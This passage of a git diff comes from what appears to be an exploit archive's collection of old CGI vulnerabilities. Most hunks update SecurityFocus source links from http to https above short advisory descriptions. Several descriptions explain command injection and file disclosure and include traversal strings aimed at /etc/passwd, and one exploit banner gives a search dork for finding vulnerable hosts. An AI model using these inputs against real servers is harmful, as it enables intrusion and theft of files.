b/exploits/cgi/remote/20164.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1604/info +source: https://www.securityfocus.com/bid/1604/info Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Account Manager. In order to accomplish this, a user would access the following URL with a POST command: diff --git a/exploits/cgi/remote/20165.html b/exploits/cgi/remote/20165.html index cdfe7f064..b8917739e 100644 --- a/exploits/cgi/remote/20165.html +++ b/exploits/cgi/remote/20165.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1604/info +source: https://www.securityfocus.com/bid/1604/info Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Account Manager. In order to accomplish this, a user would access the following URL with a POST command: 
diff --git a/exploits/cgi/remote/20176.pl b/exploits/cgi/remote/20176.pl index 9bb8c9535..8ba166f89 100755 --- a/exploits/cgi/remote/20176.pl +++ b/exploits/cgi/remote/20176.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1607/info +source: https://www.securityfocus.com/bid/1607/info Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Subscribe Me Lite. This would grant the user full administrative privileges which includes addition or removal of users from mailing lists. diff --git a/exploits/cgi/remote/20177.html b/exploits/cgi/remote/20177.html index 4e401d4ac..ff72fe7ee 100644 --- a/exploits/cgi/remote/20177.html +++ b/exploits/cgi/remote/20177.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1607/info +source: https://www.securityfocus.com/bid/1607/info Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Subscribe Me Lite. This would grant the user full administrative privileges which includes addition or removal of users from mailing lists. diff --git a/exploits/cgi/remote/20183.pl b/exploits/cgi/remote/20183.pl index 4588fc351..152628f34 100755 --- a/exploits/cgi/remote/20183.pl +++ b/exploits/cgi/remote/20183.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1621/info +source: https://www.securityfocus.com/bid/1621/info It is possible for a remote user to add an author to the author index (author.file) in GWScripts News Publisher, a web news publisher. This can be done by requesting the following raw HTTP request using any arbitrary username and password: diff --git a/exploits/cgi/remote/20194.pl b/exploits/cgi/remote/20194.pl index 58b7cab60..c745e3f05 100755 --- a/exploits/cgi/remote/20194.pl +++ b/exploits/cgi/remote/20194.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1645/info +source: https://www.securityfocus.com/bid/1645/info CGI Script Center's Auction Weaver does not verify the validity of the value in the variable 'fromfile'. Therefore it is possible to perform arbitrary commands on a remote system under the UID of the http daemon by altering the variable 'fromfile'. diff --git a/exploits/cgi/remote/20218.txt b/exploits/cgi/remote/20218.txt index 258408eb4..931130477 100644 --- a/exploits/cgi/remote/20218.txt +++ b/exploits/cgi/remote/20218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1668/info +source: https://www.securityfocus.com/bid/1668/info YaBB.pl, a web-based bulletin board script, stores board postings in numbered text files. The numbered file name is specified in the call to YaBB.pl in the variable num=. Before retrieving the file, YaBB will append a .txt extension to . diff --git a/exploits/cgi/remote/20238.txt b/exploits/cgi/remote/20238.txt index 41052e000..7691d599e 100644 --- a/exploits/cgi/remote/20238.txt +++ b/exploits/cgi/remote/20238.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1710/info +source: https://www.securityfocus.com/bid/1710/info Alabanza is a web hosting provider that offers automated solutions for virtual domain hosting. A vulnerability exists in the software implemented for automated domain administration. diff --git a/exploits/cgi/remote/20242.txt b/exploits/cgi/remote/20242.txt index 1e445b936..c187533ed 100644 --- a/exploits/cgi/remote/20242.txt +++ b/exploits/cgi/remote/20242.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1717/info +source: https://www.securityfocus.com/bid/1717/info SCO Unixware 7 default installation includes scohelp, an http server that listens on port 457/tcp and allows access to manual pages and other documentation files. The search CGI script provided for that purpose has a vulnerability that could allow any remote attacker to execute arbitrary code on the vulnerable machine with privileges of user "nobody". This poses a threat that could result in the remote compromise of the vulnerable host and provide a staging point from where an attacker could escalate privileges. diff --git a/exploits/cgi/remote/20244.txt b/exploits/cgi/remote/20244.txt index b38873d17..5dd3a6685 100644 --- a/exploits/cgi/remote/20244.txt +++ b/exploits/cgi/remote/20244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1720/info +source: https://www.securityfocus.com/bid/1720/info Talentsoft Web+ is a web application server that can be integrated with various web technologies. diff --git a/exploits/cgi/remote/20245.txt b/exploits/cgi/remote/20245.txt index 76d7ea679..9a3fbb8a7 100644 --- a/exploits/cgi/remote/20245.txt +++ b/exploits/cgi/remote/20245.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1722/info +source: https://www.securityfocus.com/bid/1722/info Talentsoft Web+ is a web application server that can be integrated with various web technologies. diff --git a/exploits/cgi/remote/20273.txt b/exploits/cgi/remote/20273.txt index ade89ef76..5c130c0ca 100644 --- a/exploits/cgi/remote/20273.txt +++ b/exploits/cgi/remote/20273.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1762/info +source: https://www.securityfocus.com/bid/1762/info The 'cached_feed' CGI script supplied by newsfeed vendor Moreover.com contains a file-disclosure vulnerability. The script's 'obtain_file' function, designed to return the contents of a specified file for display in the browser, fails to adequately filter ".." character sequences in user-supplied input. As a result, a carefully formed URL that is submitted to the script can result in the disclosure of files (readable by HTTP user) outside of the CGI script's "allowed" area. diff --git a/exploits/cgi/remote/20277.txt b/exploits/cgi/remote/20277.txt index 4f2caeff0..7052d6a8a 100644 --- a/exploits/cgi/remote/20277.txt +++ b/exploits/cgi/remote/20277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1772/info +source: https://www.securityfocus.com/bid/1772/info Master Index is a commercially supported search engine. Certain versions of this software ship with a path traversal vulnerability. This is to say that a remote user may 'back out' (.../) of the web root directory and view/download any file which the user who is running Master Index has permission to read. diff --git a/exploits/cgi/remote/20279.txt b/exploits/cgi/remote/20279.txt index 4e617bc3c..88f2e475c 100644 --- a/exploits/cgi/remote/20279.txt +++ b/exploits/cgi/remote/20279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1774/info +source: https://www.securityfocus.com/bid/1774/info Extropia WebStore is an e-commerce shopping cart application consisting of routines for error handling, order processing, encrypted mailing, frames, Javascript and VBscript. diff --git a/exploits/cgi/remote/20280.txt b/exploits/cgi/remote/20280.txt index be8e33ca4..b91afa2ba 100644 --- a/exploits/cgi/remote/20280.txt +++ b/exploits/cgi/remote/20280.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1776/info +source: https://www.securityfocus.com/bid/1776/info Bytes Interactive Web Shopper is a XML based shopping cart application. diff --git a/exploits/cgi/remote/20281.txt b/exploits/cgi/remote/20281.txt index c1e7a8bb9..1f1ff7132 100644 --- a/exploits/cgi/remote/20281.txt +++ b/exploits/cgi/remote/20281.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1777/info +source: https://www.securityfocus.com/bid/1777/info The $page variable in Hassan Consulting Shopping Cart does not properly check for insecure relative paths such as the double dot "..". Therefore, requesting the following URL will display the specified file: diff --git a/exploits/cgi/remote/20303.pl b/exploits/cgi/remote/20303.pl index d80ae676d..cdac27cff 100755 --- a/exploits/cgi/remote/20303.pl +++ b/exploits/cgi/remote/20303.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1807/info +source: https://www.securityfocus.com/bid/1807/info OatMeal studios' Mail-File is a cgi application that allows for sending of certain files to user-specified email addresses via a web interface. A vulnerability exists in this script that can be used to send the contents of any readable user-specified files to an email address. When used normally, the web interface provides the user with the option to select files to send that have been pre-configured in the script. The values of the form variables associated with each "pre-configured file" are the actual filenames that are used when opening the files. As a result, the user can manipulate the filename value so that the script will, instead of opening one of the "normal" options, open whatever has been specified as the filename (eg "../../../../../../../../../etc/passwd"). The script also checks the value of the referrer when accepting submitted input from the form but fails to protect against this attack. If exploited, an attacker can read arbitrary files on the filesystem with the privileges of the webserver. This may lead to further compromise. diff --git a/exploits/cgi/remote/20370.txt b/exploits/cgi/remote/20370.txt index 0924c304d..59dbf7a60 100644 --- a/exploits/cgi/remote/20370.txt +++ b/exploits/cgi/remote/20370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1883/info +source: https://www.securityfocus.com/bid/1883/info whois is a utility used to find general information and technical details about registered domain names. A vulnerability exists in Kootenay Web Inc's Whois (release v.1.9), a web interface to whois running on a linux server. diff --git a/exploits/cgi/remote/20387.txt b/exploits/cgi/remote/20387.txt index 5c811a1b5..ae4c3d0d0 100644 --- a/exploits/cgi/remote/20387.txt +++ b/exploits/cgi/remote/20387.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1921/info +source: https://www.securityfocus.com/bid/1921/info YaBB (Yet Another Bulletin Board) is a popular perl-based bulletin board scripting package. diff --git a/exploits/cgi/remote/20397.txt b/exploits/cgi/remote/20397.txt index da4debd90..7ad6727bd 100644 --- a/exploits/cgi/remote/20397.txt +++ b/exploits/cgi/remote/20397.txt @@ -1,4 +1,4 @@ -source : http://www.securityfocus.com/bid/1932/info +source : https://www.securityfocus.com/bid/1932/info Cart32 is a shopping cart application for e-commerce enabled sites. diff --git a/exploits/cgi/remote/20405.pl b/exploits/cgi/remote/20405.pl index 62609ae33..25ce506f2 100755 --- a/exploits/cgi/remote/20405.pl +++ b/exploits/cgi/remote/20405.pl @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/1951/info +# source: https://www.securityfocus.com/bid/1951/info # # DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums. # diff --git a/exploits/cgi/remote/20408.txt b/exploits/cgi/remote/20408.txt index ac7f9f9c6..e4b8e7749 100644 --- a/exploits/cgi/remote/20408.txt +++ b/exploits/cgi/remote/20408.txt @@ -1,4 +1,4 @@ -source : http://www.securityfocus.com/bid/1963/info +source : https://www.securityfocus.com/bid/1963/info CGIForum is a commercial cgi script from Markus Triska which is designed to facilitate web-based threaded discussion forums. diff --git a/exploits/cgi/remote/20423.txt b/exploits/cgi/remote/20423.txt index 96f868c85..a66eed5f3 100644 --- a/exploits/cgi/remote/20423.txt +++ b/exploits/cgi/remote/20423.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1975/info +source: https://www.securityfocus.com/bid/1975/info Campas is a sample CGI script shipped with some older versions of NCSA HTTPd, an obsolete web server package. The versions that included the script could not be determined as the server is no longer maintained, but version 1.2 of the script itself is known to be vulnerable. The script fails to properly filter user supplied variables, and as a result can be used to execute commands on the host with the privileges of the web server. Commands can be passed as a variable to the script, separated by %0a (linefeed) characters. See exploit for example. Successful exploitation of this vulnerability could be used to deface the web site, read any files the server process has access to, get directory listings, and execute anything else the web server has access to. diff --git a/exploits/cgi/remote/20430.txt b/exploits/cgi/remote/20430.txt index 66758259b..f486b5c13 100644 --- a/exploits/cgi/remote/20430.txt +++ b/exploits/cgi/remote/20430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1995/info +source: https://www.securityfocus.com/bid/1995/info The info2www script allows HTTP access to information stored in GNU EMACS Info Nodes. This script fails to properly parse input and can be used to execute commands on the server with permissions of the web server, by passing commands as part of a variable. Potential consequences of a successful exploitation involve anything the web server process has permissions to do, including possibly web site defacement. diff --git a/exploits/cgi/remote/20433.txt b/exploits/cgi/remote/20433.txt index 241d69a8d..d4543fdcc 100644 --- a/exploits/cgi/remote/20433.txt +++ b/exploits/cgi/remote/20433.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2000/info +source: https://www.securityfocus.com/bid/2000/info Whois scripts provide InterNIC lookup services via HTTP. The vulnerable scripts include versions of Matt's Whois and CGI City Whois. Older versions of these fail to filter metacharacters, allowing execution of arbitrary commands by embedding the commands in the domain name to lookup. Specifically, the UNIX command separation character ";" can be used to execute commands. Successful exploitation of this vulnerability would allow an attacker to execute commands with the privileges of the web server process, which could result in retrieval of sensitive information, web defacements, etc. diff --git a/exploits/cgi/remote/20434.txt b/exploits/cgi/remote/20434.txt index 49b61ec70..008b33eec 100644 --- a/exploits/cgi/remote/20434.txt +++ b/exploits/cgi/remote/20434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2001/info +source: https://www.securityfocus.com/bid/2001/info Miva's htmlscript CGI program provides a unique scripting language with HTML type tags. (Note that htmlscript is an older product no longer distributed by Miva under that name.) Versions of the htmlscript interpreter (a CGI script) prior to 2.9932 are vulnerable to a file reading directory traversal attack using relative paths (eg., "../../../../../../etc/passwd"). An attacker need only append this path as a variable passed to the script via a URL. The contents of any file to which the web server process has read access can be retrieved using this method. diff --git a/exploits/cgi/remote/20435.txt b/exploits/cgi/remote/20435.txt index 75296d7e0..3f692268d 100644 --- a/exploits/cgi/remote/20435.txt +++ b/exploits/cgi/remote/20435.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2003/info +source: https://www.securityfocus.com/bid/2003/info NCSA HTTPd and comes with a CGI sample shell script, test-cgi, located by default in /cgi-bin. This script does not properly enclose an "ECHO" command in quotes, and as a result "shell expansion" of the * character can occur under some configurations. This allows a remote attacker to obtain file listings, by passing *, /*, /usr/* etc., as variables. The ECHO command expands the * to give a directory listing of the specified directory. This could be used to gain information to facilitate future attacks. This is identical to a problem with another sample script, nph-test-cgi. See references. diff --git a/exploits/cgi/remote/20442.html b/exploits/cgi/remote/20442.html index f3633d1cf..3c5571ccb 100644 --- a/exploits/cgi/remote/20442.html +++ b/exploits/cgi/remote/20442.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2019/info +source: https://www.securityfocus.com/bid/2019/info Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to execute any command on the host machine, with the privileges of the web server. If the attacker can submit a command to run as a hidden variable that command will be executed. Normally this variable is reserved for the mail program and is accessed from an HTML page with the following piece of code: diff --git a/exploits/cgi/remote/20444.txt b/exploits/cgi/remote/20444.txt index 542449a78..83b1473a4 100644 --- a/exploits/cgi/remote/20444.txt +++ b/exploits/cgi/remote/20444.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2020/info +source: https://www.securityfocus.com/bid/2020/info Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to read files on the host machine, with the privileges of the web server. This can be accomplished by embedding the input redirection metacharacter along with a filename into the form field used for e-mail address entry (). Any file that the web server process has read access to can be retrieved. diff --git a/exploits/cgi/remote/20446.txt b/exploits/cgi/remote/20446.txt index 047af7306..8cdc09fda 100644 --- a/exploits/cgi/remote/20446.txt +++ b/exploits/cgi/remote/20446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2024/info +source: https://www.securityfocus.com/bid/2024/info The freeware guestbook package from freeware.webcom.se provides a web-based guestbook feature, using CGI. Some versions of this guestbook (undetermined at the time of writing) are vulnerable to an attack allowing an intruder to retrieve the contents of arbitrary files to which the web server has access. This can be accomplished by specifying the path and filename as the parameter "template" to either rguest.exe or wguest.exe - see Exploit for example. These two programs typically reside in /cgi-bin. diff --git a/exploits/cgi/remote/20447.txt b/exploits/cgi/remote/20447.txt index 3b8dbc486..7039993e0 100644 --- a/exploits/cgi/remote/20447.txt +++ b/exploits/cgi/remote/20447.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2024/info +source: https://www.securityfocus.com/bid/2024/info The freeware guestbook package from freeware.webcom.se provides a web-based guestbook feature, using CGI. Some versions of this guestbook (undetermined at the time of writing) are vulnerable to an attack allowing an intruder to retrieve the contents of arbitrary files to which the web server has access. This can be accomplished by specifying the path and filename as the parameter "template" to either rguest.exe or wguest.exe - see Exploit for example. These two programs typically reside in /cgi-bin. diff --git a/exploits/cgi/remote/20448.txt b/exploits/cgi/remote/20448.txt index 0d7219377..2dd5513ce 100644 --- a/exploits/cgi/remote/20448.txt +++ b/exploits/cgi/remote/20448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2025/info +source: https://www.securityfocus.com/bid/2025/info Novell NetWare Web Server 2.x versions came with a CGI written in BASIC called convert.bas. This script allows retrieval of files outside of the normal web server context. This can be accomplished simply by submitting the filename and path as a parameter to the script, using relative paths (../../) to traverse directories. Access may or may not be limited to the SYS: volume. diff --git a/exploits/cgi/remote/20463.txt b/exploits/cgi/remote/20463.txt index 585688dd5..95bb6483b 100644 --- a/exploits/cgi/remote/20463.txt +++ b/exploits/cgi/remote/20463.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2058/info +source: https://www.securityfocus.com/bid/2058/info WEBgais is a script that provides a web interface to the "gais" (Global Area Intelligent Search) search engine tool. All versions up to 1.0B2 are vulnerable. The vulnerable script is /cgi-bin/webgais: due to improper input checking it allows a remote attacker to execute commands at the privilege level of the web server. A specifically formatted query allows the vulnerable code to be executed; this query must include the parameters output=subject and domain=paragraph. These two parameters must be included, otherwise the vulnerable code is not executed. The problem lies in an improperly protected Perl "system" command that can be circumvented by encapsulating the malicious command in single quotes and using the unix shell command separation metacharacter ";". See exploit for an example. diff --git a/exploits/cgi/remote/20465.sh b/exploits/cgi/remote/20465.sh index d684f7e76..9698b9088 100755 --- a/exploits/cgi/remote/20465.sh +++ b/exploits/cgi/remote/20465.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2059/info +source: https://www.securityfocus.com/bid/2059/info The 'cachemgr.cgi' module is a management interface for the Squid proxy service. It was installed by default in '/cgi-bin' by Red Hat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port, which it then tries to connect to. If a webserver such as Apache is running, this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial-of-service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established. diff --git a/exploits/cgi/remote/20483.txt b/exploits/cgi/remote/20483.txt index 4cf86827c..ffce98e2e 100644 --- a/exploits/cgi/remote/20483.txt +++ b/exploits/cgi/remote/20483.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2077/info +source: https://www.securityfocus.com/bid/2077/info WEBgais is a package that provides a web interface to the "gais" (Global Area Intelligent Search) search engine tool. This package contains a vulnerable script, websendmail, which can be used to execute arbitrary commands on the server with the privileges of the web server. User supplied data (from the "receiver=" form variable) is passed to a Perl OPEN function without proper input verification, allowing the use of shell metacharacters to separate commands. This can be directly exploited by submitting via the POST method the variable "receiver=" with the command separation shell metacharacter (;) followed by a command. Consequences could range from destruction of data and web site defacement to elevation of privileges through locally exploitable vulnerabilities. diff --git a/exploits/cgi/remote/20497.html b/exploits/cgi/remote/20497.html index 0dced463f..4f7a8a9f7 100644 --- a/exploits/cgi/remote/20497.html +++ b/exploits/cgi/remote/20497.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2101/info +source: https://www.securityfocus.com/bid/2101/info An input validation vulnerability exists in Leif M. Wright's everything.cgi, a Perl-based form design tool. diff --git a/exploits/cgi/remote/20503.html b/exploits/cgi/remote/20503.html index a2bc98c60..d8b88d783 100644 --- a/exploits/cgi/remote/20503.html +++ b/exploits/cgi/remote/20503.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2102/info +source: https://www.securityfocus.com/bid/2102/info A vulnerabiliy exists in Leif M. Wright's simplestmail.cgi, a script designed to coordinate email responses from web forms. diff --git a/exploits/cgi/remote/20504.html b/exploits/cgi/remote/20504.html index 3665621a2..f2d59d578 100644 --- a/exploits/cgi/remote/20504.html +++ b/exploits/cgi/remote/20504.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2103/info +source: https://www.securityfocus.com/bid/2103/info ad.cgi is an ad rotation script freely available, and written by Leif Wright. A problem exists in the script which may allow access to restricted resources. diff --git a/exploits/cgi/remote/20506.html b/exploits/cgi/remote/20506.html index 19a12375d..f2c0bc0cb 100644 --- a/exploits/cgi/remote/20506.html +++ b/exploits/cgi/remote/20506.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2106/info +source: https://www.securityfocus.com/bid/2106/info A vulnerabiliy exists in Leif M. Wright's simplestguest.cgi, a script designed to coordinate guestbook submissions from website visitors. diff --git a/exploits/cgi/remote/20522.txt b/exploits/cgi/remote/20522.txt index 3101e5bca..e283b1a9a 100644 --- a/exploits/cgi/remote/20522.txt +++ b/exploits/cgi/remote/20522.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2155/info +source: https://www.securityfocus.com/bid/2155/info Technote Inc. offers a Multicommunication Package which includes a web board type of service. diff --git a/exploits/cgi/remote/20523.pl b/exploits/cgi/remote/20523.pl index 8ecd9b782..07d293378 100755 --- a/exploits/cgi/remote/20523.pl +++ b/exploits/cgi/remote/20523.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2156/info +source: https://www.securityfocus.com/bid/2156/info Technote Inc. offers a multi-communication Package that includes a web board type of service. @@ -181,7 +181,7 @@ print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\n Technote Inc. from Korea Command Excution Command Execution Vulnerability by SPABAM 2004" ; -print "\n http://www.securityfocus.com/bid/2156 +print "\n https://www.securityfocus.com/bid/2156 "; print "\n Technote Exploit v1.2"; print "\n \n sugg.. google it: allinurl:technote/main.cgi*filename=*"; 
diff --git a/exploits/cgi/remote/20524.txt b/exploits/cgi/remote/20524.txt index f2de56b58..b713a0a43 100644 --- a/exploits/cgi/remote/20524.txt +++ b/exploits/cgi/remote/20524.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2159/info +source: https://www.securityfocus.com/bid/2159/info An input validation vulnerability exists in Brian Stanback's bsguest.cgi, a script designed to coordinate guestbook submissions from website visitors. diff --git a/exploits/cgi/remote/20525.txt b/exploits/cgi/remote/20525.txt index 8b0579aa2..3825272ff 100644 --- a/exploits/cgi/remote/20525.txt +++ b/exploits/cgi/remote/20525.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2160/info +source: https://www.securityfocus.com/bid/2160/info An input validation vulnerability exists in Brian Stanback's bslist.cgi, a script designed to coordinate mailing lists. diff --git a/exploits/cgi/remote/20527.txt b/exploits/cgi/remote/20527.txt index 0520087bc..0611684c1 100644 --- a/exploits/cgi/remote/20527.txt +++ b/exploits/cgi/remote/20527.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2166/info +source: https://www.securityfocus.com/bid/2166/info Informix Webdriver, the web-to-DB interface used by Informix database products, may permit unauthorized remote access to the system's administration functions. diff --git a/exploits/cgi/remote/20533.txt b/exploits/cgi/remote/20533.txt index 1d7a8c3b0..63a915615 100644 --- a/exploits/cgi/remote/20533.txt +++ b/exploits/cgi/remote/20533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2177/info +source: https://www.securityfocus.com/bid/2177/info bbs_forum.cgi is a popular Perl cgi script from eXtropia.com. It supports the creation and maintenance of web-based threaded discussion forums. diff --git a/exploits/cgi/remote/20567.txt b/exploits/cgi/remote/20567.txt index 22536f889..90fc9c925 100644 --- a/exploits/cgi/remote/20567.txt +++ b/exploits/cgi/remote/20567.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2250/info +source: https://www.securityfocus.com/bid/2250/info PHP/FI is an software suite designed to offer enhanced features to sites served via the World Wide Web. It is open source, freely available, and maintained by the PHP development team. diff --git a/exploits/cgi/remote/20570.txt b/exploits/cgi/remote/20570.txt index 65092ad8f..36fb25ce0 100644 --- a/exploits/cgi/remote/20570.txt +++ b/exploits/cgi/remote/20570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2255/info +source: https://www.securityfocus.com/bid/2255/info 'dumpenv.pl' is a utility that will display environment information on which the server resides, this information could include the server software version being used, directory settings and path information. diff --git a/exploits/cgi/remote/20583.pl b/exploits/cgi/remote/20583.pl index 4cf1b9da7..042e5f965 100755 --- a/exploits/cgi/remote/20583.pl +++ b/exploits/cgi/remote/20583.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2265/info +source: https://www.securityfocus.com/bid/2265/info textcounter.pl is distributed through Matt's Scripts archive, and provides added features to httpd servers such as counters, guestbooks, and http cookie management. Due to insufficient checking of entered characters, it is possible for a remote user to input custom formatted strings into the $DOCUMENT_URI environment variable which, which when parsed can be executed as the UID of the httpd process. This makes it possible for a user with malicious intentions to execute arbitrary commands, and potentially gain access to the local host. diff --git a/exploits/cgi/remote/20606.pl b/exploits/cgi/remote/20606.pl index 4c532661e..f40a84141 100755 --- a/exploits/cgi/remote/20606.pl +++ b/exploits/cgi/remote/20606.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2329/info +source: https://www.securityfocus.com/bid/2329/info Improperly validated user-supplied input to the Content-Type header can create an overflow condition. diff --git a/exploits/cgi/remote/20609.txt b/exploits/cgi/remote/20609.txt index 9ce5a5e59..95bb13904 100644 --- a/exploits/cgi/remote/20609.txt +++ b/exploits/cgi/remote/20609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2336/info +source: https://www.securityfocus.com/bid/2336/info Requesting a specially crafted URL will make it possible for a remote attacker to disclose the physical path to the web root and peruse the entire directory listing. diff --git a/exploits/cgi/remote/20611.txt b/exploits/cgi/remote/20611.txt index 0a82ba342..8d77b7f8b 100644 --- a/exploits/cgi/remote/20611.txt +++ b/exploits/cgi/remote/20611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2338/info +source: https://www.securityfocus.com/bid/2338/info A vulnerability exists in Anaconda Foundation Directory which allows a remote user to traverse the filesystem of a target computer. This may lead to the disclosure of file and directory contents. diff --git a/exploits/cgi/remote/20623.txt b/exploits/cgi/remote/20623.txt index 173a9804f..c23d4b4d6 100644 --- a/exploits/cgi/remote/20623.txt +++ b/exploits/cgi/remote/20623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2361/info +source: https://www.securityfocus.com/bid/2361/info It is possible for a remote user to gain read access to directories and files outside the root directory of Carey Internet Services Commerce.cgi. Requesting a specially crafted URL composed of '/../%00' along with the known filename or directory will disclose the requested resource. diff --git a/exploits/cgi/remote/20629.txt b/exploits/cgi/remote/20629.txt index 859cd2fe0..fba5fd737 100644 --- a/exploits/cgi/remote/20629.txt +++ b/exploits/cgi/remote/20629.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2370/info +source: https://www.securityfocus.com/bid/2370/info A remote user could gain read access to known files outside of the root directory where Way-Board resides. Requesting a specially crafted URL composed of '%00' sequences along with the known filename will disclose the requested file. diff --git a/exploits/cgi/remote/20630.txt b/exploits/cgi/remote/20630.txt index 0d32d49f4..41d3c059f 100644 --- a/exploits/cgi/remote/20630.txt +++ b/exploits/cgi/remote/20630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2371/info +source: https://www.securityfocus.com/bid/2371/info A remote user could gain read access to known files outside of the root directory where Martin Hamilton ROADS resides. Requesting a specially crafted URL composed of '%00' sequences along with the known filename will disclose the requested file. diff --git a/exploits/cgi/remote/20631.txt b/exploits/cgi/remote/20631.txt index bcc5436bd..58f9880b6 100644 --- a/exploits/cgi/remote/20631.txt +++ b/exploits/cgi/remote/20631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2372/info +source: https://www.securityfocus.com/bid/2372/info A specially crafted URL composed of a known filename, will disclose the requested file residing on a machine running WebPALS. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. diff --git a/exploits/cgi/remote/20632.txt b/exploits/cgi/remote/20632.txt index 5b2065e1a..6b626e6cb 100644 --- a/exploits/cgi/remote/20632.txt +++ b/exploits/cgi/remote/20632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2372/info +source: https://www.securityfocus.com/bid/2372/info A specially crafted URL composed of a known filename, will disclose the requested file residing on a machine running WebPALS. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. 
diff --git a/exploits/cgi/remote/20633.txt b/exploits/cgi/remote/20633.txt index e6a30b3d2..b25f91d83 100644 --- a/exploits/cgi/remote/20633.txt +++ b/exploits/cgi/remote/20633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2374/info +source: https://www.securityfocus.com/bid/2374/info Making an invalid request to a machine running Brightstation Muscat, will disclose the physical path to the root directory. diff --git a/exploits/cgi/remote/20642.pl b/exploits/cgi/remote/20642.pl index 2cc3befd3..747327959 100755 --- a/exploits/cgi/remote/20642.pl +++ b/exploits/cgi/remote/20642.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2393/info +source: https://www.securityfocus.com/bid/2393/info Adcycle is a package of perl scripts available from Adcycle.com. The scripts are designed to manage banner ad rotation through a web interface, backended with a MySQL database. diff --git a/exploits/cgi/remote/20683.txt b/exploits/cgi/remote/20683.txt index 5606a333b..1d24cbc3e 100644 --- a/exploits/cgi/remote/20683.txt +++ b/exploits/cgi/remote/20683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2471/info +source: https://www.securityfocus.com/bid/2471/info Ikonboard is a perl-based discussion forum script from ikonboard.com. diff --git a/exploits/cgi/remote/20686.txt b/exploits/cgi/remote/20686.txt index ce857193a..9f855d791 100644 --- a/exploits/cgi/remote/20686.txt +++ b/exploits/cgi/remote/20686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2484/info +source: https://www.securityfocus.com/bid/2484/info A vulnerability exists in a CGI script called "The 